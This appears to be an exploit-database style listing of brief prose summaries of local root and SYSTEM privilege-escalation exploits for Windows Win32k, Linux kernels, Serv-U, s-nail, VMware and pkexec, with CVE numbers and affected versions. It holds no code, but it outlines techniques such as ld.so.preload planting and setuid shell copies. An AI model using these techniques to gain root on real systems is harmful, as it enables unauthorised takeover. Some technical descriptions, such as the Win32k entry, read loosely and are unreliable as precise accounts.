This exploit is a local privilege escalation vulnerability in Windows Win32k. It allows an attacker to gain SYSTEM privileges by exploiting a race condition in the xxHMValidateHandle and NtAllocateVirtualMemory functions. The exploit works by allocating a memory region with NtAllocateVirtualMemory, then calling xxHMValidateHandle to overwrite the memory region with a specially crafted structure. This structure contains a pointer to a function that will be executed with SYSTEM privileges.
The lastore-daemon D-Bus configuration on Deepin Linux 15.5 permits any user in the sudo group to install arbitrary packages without providing a password, resulting in code execution as root. By default, the first user created on the system is a member of the sudo group.
This exploit uses an overwrite of /etc/ld.so.preload to get root on a vulnerable system. It exploits unsanitized env var passing in ASAN which leads to file clobbering as root when executing setuid root binaries compiled with ASAN.
SUroot is a local root exploit for Serv-U FTP Server versions prior to 15.1.7 (CVE-2019-12181). It is a Bash variant of Guy Levin's Serv-U FTP Server exploit. The exploit works by setting the /usr/local/Serv-U/Serv-U binary to setuid root and then executing a command to copy /bin/bash to /tmp/sh and set the ownership and permissions of the file to root. The exploit then launches a root shell using the /tmp/sh binary.
This exploit is a wrapper for @wapiflapi's s-nail-privget.c local root exploit for CVE-2017-5899. It uses ld.so.preload technique to gain more privileges than s-nail and will be used to create lock files. It creates a shared library file and adds it to the /etc/ld.so.preload file. It then starts a race between the exploit and the s-nail-privsep program. If the exploit wins the race, it will gain root privileges and launch a root shell.
This exploit is for VMware Workstation Player and Pro versions 12.5.5 and below. It creates a directory, writes a C program to it, compiles it, removes the C program, and writes an .asoundrc file. It then executes the vmplayer binary, which loads the shared object file and runs the code, granting the user root privileges.
chocobo_root.c is a linux AF_PACKET race condition exploit for CVE-2016-8655. It includes KASLR and SMEP/SMAP bypasses and is tested on Ubuntu 14.04 / 16.04 (x86_64) kernels 4.4.0 before 4.4.0-53.74. The exploit is used to gain root access on the system.
This proof-of-concept local root exploit for CVE-2017-1000112 includes KASLR and SMEP bypasses, but no SMAP bypass. It has been tested on Ubuntu trusty 4.4.0 kernels, Ubuntu xenial 4.4.0 and 4.8.0 kernels, Linux Mint rosa 4.4.0 kernels, Linux Mint sarah 4.8.0 kernels, and Zorin OS 12.1 4.4.0-39 kernel.
This exploit is a wrapper for Jann Horn's exploit for CVE-2018-18955. It uses the polkit technique to launch a root shell. It compiles three C files, subuid_shell.c, subshell.c and rootshell.c, and creates a policy file in /usr/share/polkit-1/actions/subuid.policy. It then launches pkexec and executes the root shell.
This exploit uses the pkexec technique to gain root access on Linux 4.10 < 5.1.17. It was originally discovered and exploited by Jann Horn and later modified by bcoles@gmail.com to add known helper paths, search for suitable helpers, automatic targeting, and changing the target suid executable from passwd to pkexec.
Services By CQR